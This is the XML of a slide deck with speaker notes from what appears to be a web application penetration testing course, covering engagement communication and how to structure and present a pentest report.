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649" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId152"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId153"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="274" r:id="rId2"/>
    <p:sldId id="482" r:id="rId3"/>
    <p:sldId id="275" r:id="rId4"/>
    <p:sldId id="276" r:id="rId5"/>
    <p:sldId id="277" r:id="rId6"/>
    <p:sldId id="278" r:id="rId7"/>
    <p:sldId id="279" r:id="rId8"/>
    <p:sldId id="280" r:id="rId9"/>
    <p:sldId id="281" r:id="rId10"/>
    <p:sldId id="282" r:id="rId11"/>
    <p:sldId id="283" r:id="rId12"/>
    <p:sldId id="284" r:id="rId13"/>
    <p:sldId id="285"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6" r:id="rId27"/>
    <p:sldId id="307" r:id="rId28"/>
    <p:sldId id="477" r:id="rId29"/>
    <p:sldId id="308" r:id="rId30"/>
    <p:sldId id="309" r:id="rId31"/>
    <p:sldId id="310" r:id="rId32"/>
    <p:sldId id="311" r:id="rId33"/>
    <p:sldId id="312" r:id="rId34"/>
    <p:sldId id="478" r:id="rId35"/>
    <p:sldId id="313" r:id="rId36"/>
    <p:sldId id="479" r:id="rId37"/>
    <p:sldId id="484" r:id="rId38"/>
    <p:sldId id="483" r:id="rId39"/>
    <p:sldId id="485" r:id="rId40"/>
    <p:sldId id="314" r:id="rId41"/>
    <p:sldId id="315" r:id="rId42"/>
    <p:sldId id="321" r:id="rId43"/>
    <p:sldId id="322" r:id="rId44"/>
    <p:sldId id="323" r:id="rId45"/>
    <p:sldId id="324" r:id="rId46"/>
    <p:sldId id="325" r:id="rId47"/>
    <p:sldId id="326" r:id="rId48"/>
    <p:sldId id="327" r:id="rId49"/>
    <p:sldId id="328" r:id="rId50"/>
    <p:sldId id="332" r:id="rId51"/>
    <p:sldId id="333" r:id="rId52"/>
    <p:sldId id="334" r:id="rId53"/>
    <p:sldId id="335" r:id="rId54"/>
    <p:sldId id="336" r:id="rId55"/>
    <p:sldId id="337" r:id="rId56"/>
    <p:sldId id="338" r:id="rId57"/>
    <p:sldId id="503" r:id="rId58"/>
    <p:sldId id="504" r:id="rId59"/>
    <p:sldId id="505" r:id="rId60"/>
    <p:sldId id="506" r:id="rId61"/>
    <p:sldId id="507" r:id="rId62"/>
    <p:sldId id="508" r:id="rId63"/>
    <p:sldId id="509" r:id="rId64"/>
    <p:sldId id="510" r:id="rId65"/>
    <p:sldId id="339" r:id="rId66"/>
    <p:sldId id="349" r:id="rId67"/>
    <p:sldId id="350" r:id="rId68"/>
    <p:sldId id="351" r:id="rId69"/>
    <p:sldId id="352" r:id="rId70"/>
    <p:sldId id="445" r:id="rId71"/>
    <p:sldId id="353" r:id="rId72"/>
    <p:sldId id="354" r:id="rId73"/>
    <p:sldId id="355" r:id="rId74"/>
    <p:sldId id="356" r:id="rId75"/>
    <p:sldId id="357" r:id="rId76"/>
    <p:sldId id="358" r:id="rId77"/>
    <p:sldId id="359" r:id="rId78"/>
    <p:sldId id="360" r:id="rId79"/>
    <p:sldId id="361" r:id="rId80"/>
    <p:sldId id="446" r:id="rId81"/>
    <p:sldId id="447" r:id="rId82"/>
    <p:sldId id="448" r:id="rId83"/>
    <p:sldId id="449" r:id="rId84"/>
    <p:sldId id="367" r:id="rId85"/>
    <p:sldId id="368" r:id="rId86"/>
    <p:sldId id="369" r:id="rId87"/>
    <p:sldId id="370" r:id="rId88"/>
    <p:sldId id="371" r:id="rId89"/>
    <p:sldId id="372" r:id="rId90"/>
    <p:sldId id="373" r:id="rId91"/>
    <p:sldId id="374" r:id="rId92"/>
    <p:sldId id="375" r:id="rId93"/>
    <p:sldId id="376" r:id="rId94"/>
    <p:sldId id="377" r:id="rId95"/>
    <p:sldId id="378" r:id="rId96"/>
    <p:sldId id="379" r:id="rId97"/>
    <p:sldId id="380" r:id="rId98"/>
    <p:sldId id="381" r:id="rId99"/>
    <p:sldId id="382" r:id="rId100"/>
    <p:sldId id="383" r:id="rId101"/>
    <p:sldId id="384" r:id="rId102"/>
    <p:sldId id="385" r:id="rId103"/>
    <p:sldId id="386" r:id="rId104"/>
    <p:sldId id="387" r:id="rId105"/>
    <p:sldId id="388" r:id="rId106"/>
    <p:sldId id="389" r:id="rId107"/>
    <p:sldId id="390" r:id="rId108"/>
    <p:sldId id="391" r:id="rId109"/>
    <p:sldId id="397" r:id="rId110"/>
    <p:sldId id="398" r:id="rId111"/>
    <p:sldId id="399" r:id="rId112"/>
    <p:sldId id="400" r:id="rId113"/>
    <p:sldId id="401" r:id="rId114"/>
    <p:sldId id="402" r:id="rId115"/>
    <p:sldId id="403" r:id="rId116"/>
    <p:sldId id="404" r:id="rId117"/>
    <p:sldId id="405" r:id="rId118"/>
    <p:sldId id="406" r:id="rId119"/>
    <p:sldId id="407" r:id="rId120"/>
    <p:sldId id="408" r:id="rId121"/>
    <p:sldId id="409" r:id="rId122"/>
    <p:sldId id="511" r:id="rId123"/>
    <p:sldId id="512" r:id="rId124"/>
    <p:sldId id="513" r:id="rId125"/>
    <p:sldId id="514" r:id="rId126"/>
    <p:sldId id="515" r:id="rId127"/>
    <p:sldId id="516" r:id="rId128"/>
    <p:sldId id="517" r:id="rId129"/>
    <p:sldId id="518" r:id="rId130"/>
    <p:sldId id="519" r:id="rId131"/>
    <p:sldId id="520" r:id="rId132"/>
    <p:sldId id="521" r:id="rId133"/>
    <p:sldId id="522" r:id="rId134"/>
    <p:sldId id="523" r:id="rId135"/>
    <p:sldId id="524" r:id="rId136"/>
    <p:sldId id="525" r:id="rId137"/>
    <p:sldId id="526" r:id="rId138"/>
    <p:sldId id="527" r:id="rId139"/>
    <p:sldId id="528" r:id="rId140"/>
    <p:sldId id="529" r:id="rId141"/>
    <p:sldId id="530" r:id="rId142"/>
    <p:sldId id="531" r:id="rId143"/>
    <p:sldId id="532" r:id="rId144"/>
    <p:sldId id="533" r:id="rId145"/>
    <p:sldId id="534" r:id="rId146"/>
    <p:sldId id="535" r:id="rId147"/>
    <p:sldId id="536" r:id="rId148"/>
    <p:sldId id="537" r:id="rId149"/>
    <p:sldId id="502" r:id="rId150"/>
    <p:sldId id="444" r:id="rId151"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7315200" cy="9601200"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId154"/>
      <p:bold r:id="rId155"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId156"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
      <p:regular r:id="rId156"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
      <p:regular r:id="rId157"/>
    </p:embeddedFont>
  </p:embeddedFontLst>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="4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4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4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4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4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="4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00"/>
    <a:srgbClr val="99FFCC"/>
    <a:srgbClr val="00FF00"/>
    <a:srgbClr val="FF0000"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="000066"/>
    <a:srgbClr val="FF33CC"/>
    <a:srgbClr val="FF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31" autoAdjust="0"/>
    <p:restoredTop sz="80390" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="79" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="986" y="31"/>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66" d="100"/>
        <a:sy n="66" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-2179" y="93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font" Target="fonts/font1.fntdata"/><Relationship Id="rId159"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font" Target="fonts/font2.fntdata"/><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handoutMaster" Target="handoutMasters/handoutMaster1.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microsoft.com/office/2015/10/relationships/revisionInfo" Target="revisionInfo.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font" Target="fonts/font4.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2258"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defTabSz="966788">
              <a:defRPr sz="1300" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352259"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algn="r" defTabSz="966788">
              <a:defRPr sz="1300" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352260"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defTabSz="966788">
              <a:defRPr sz="1300" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352261"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algn="r" defTabSz="966788">
              <a:defRPr sz="1300">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7B84F0AD-B8EC-4E4C-96AB-90A3127EB247}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36130586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44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560888"/>
            <a:ext cx="5943600" cy="4354512"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="9220200"/>
            <a:ext cx="3170238" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217056432"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:notesStyle>
    <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
      <a:spcBef>
        <a:spcPts val="363"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="10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Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited web sites altered by attackers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In the next few days, you'll learn the art of exploiting web applications, so you can find flaws in your enterprise's web apps before the bad guys do. Through detailed, hands-on exercises and these materials, you will be taught the four-step process for web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And, you will explore various other web app vulnerabilities in-depth, with tried-and-true techniques for finding them using a structured testing regimen. As well as the vulnerabilities, you will learn the tools and methods of the attacker, so that you can be a powerful defender.</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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In order to exploit web applications, we need to have a deep understanding of how the web works-- and how it doesn't work.  This understanding must be deeper than the average user's level of knowledge, and even developers and web administrators.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>After today, you will look at the web differently. We are going to review the technical underpinnings of the web and discuss security strengths and weaknesses. I have always described this as using our peripheral vision when looking at sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB"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10</a:t>
            </a:fld>
            <a:endParaRPr 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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291844"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The communication paths also need to be worked out and coordinated.  This includes the paths communication needs to follow, the methods allowed and the protections within those methods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The paths would include information such as, who would be contacted in case of technical problems.  An example would be if the site crashes due to the test.  You would also want to work out who handles the management of the test.  This enables the tester to have a point of contact when information is needed or if approval needs to happen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The client and the testers will also need to coordinate which methods are allowed.  For example would e-mail suffice or does the client want a daily conference call with all involved.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The final part of communication is the protections involved.  Does the client support PGP for e-mail or will the tester need to use some other form of encryption.  If instant messaging is going to be used will both parties use the Off-the-Record IM encryption or explore another solution.</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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29286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This next section is about the most important part of the test, the report.  While this is usually the portion groaned about by the testers, it is the piece that most people remember the test with.</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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29389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Reporting is probably the most disliked portion of doing any type of testing.  We all love finding the next great hack or figuring out a way to bypass the trickiest of filters.  But few people like to write the report telling the application owner what happened.  But we need to keep in mind that this is probably the most important piece of the test.  This is because it is the part that actually lasts.  Most companies will take the report and use it as the guidelines on what to fix and how to move forward in securing their applications.  Quite often it will guide further developments efforts.</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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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There are five pieces to a report, the executive summary, introductions, methodology, findings and conclusions.   The entire testing process fed a collection of information.  This collection is the basis of the report.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will explore each of these in the next few slides.</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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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The executive summary is typically the hardest part for us to write.  Because of this we usually leave it for last.  Of course this helps since we need to have all of the rest of the report to determine what needs to be part of this.  It should be high level and short.  We usually don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t go beyond a page or a page and a half.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The summary should target the things that can have the biggest impact.  Remember that this may be the only piece of the report that management reads, so make sure that any recommendations given will make the biggest or most important changes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We need to make sure that we include a description of any findings and why they need to be fixed.  Then give a recommendation on ways to remediate the issue.  If possible, give more than one.  For example, talk about whitelisting input to ensure that input attacks are blocked, but also outline how blacklisting works.  While we can explain why one is better than the other, we need to realize that they may have restrictions that we are not aware of that would prevent the implementation of a whitelist.</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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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The introduction is a quick portion of the report where you will outline the scope of the test.  You should also list any specific objectives.  For example, if the target was to access the back end administration portion of the site through the Internet, make sure that is clear.  Another part of the objectives portion is to outline any restrictions that you had.  An example would be if the company did not want you to test the authentication system for whatever reason.  This needs to be outlined to ensure that people understand what was tested and what was not.  You should also outline the team involved.  This includes the people doing the test and the people involved at the company requesting the test.  This enables internal follow up if any questions come up later.  </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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297988"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Finally, the report should include some discussion of the methodology followed to perform the test.  As we will talk later, this ensures that your test can be verified and repeated.  Provide enough depth so that a competent penetration tester could repeat your results, and so that a competent security professional who is not a penetration tester can understand your overall process flow.</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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29901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The findings are really the meat of the report.  They are what the entire test was for.  The findings need to be categorized.  We typically use a High/Medium/Low/Notes system where we determine the risk level that each finding falls into and then explain what the finding means and why it falls into the specific risk level.  Each finding should include the recommendations.  The Notes risk level is for any problem found that does not relate directly to the web application.  For example, if the application allows us to read the /etc/shadow file and we are able to crack the root password because it is toor, this would go into a Notes finding.  The reason is that while that password is ridiculously weak, it is not a vulnerability within the application.  Of course the fact we could read the /etc/shadow file in the first place WOULD be a High finding.</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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30003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The conclusions are the final piece of the report.  It is where the tester can reiterate some of the points of the executive summary as well as any findings that they would like to draw more attention too.  It is usually a very short section of the report but may contain any appendixes, such as a listing of tools used or any bulk listings of files.</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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30618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The presentation portion of a test is optional.  We like to recommend that people have this but some companies choose to skip it.  The presentation is basically a slide deck that outlines what was tested, what was found and recommendations on how to repair the issues.  We like to work with the target company to ensure that any message they want to get to developers, administrators or others is included in this presentation.  While we usually don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t have a lot of control over who comes to this presentation, we try to recommend that a wide range of staff is included.  If time permits, we will try to separate developers and admins or technicians and management.  This is because those are separate audiences that require a different approach.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One important point in building the presentation is to redact any sensitive information.  For example, don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t include URLs to pages that are vulnerable to SQL injection.  If you do, someone will try it out and cause problems.  We try to give an overview of the finding and how it works in a generic sense.  Then we work with the client to ensure that anyone who needs to know exactly how the exploit happens understands it.</a:t>
            </a:r>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109</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Successful web penetration testers follow a proven methodology.  Without it, you will miss vulnerabilities and not complete the job.  The methodology that we are going to cover today and the rest of this week is designed specifically to fulfill the needs of penetration testers. It is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
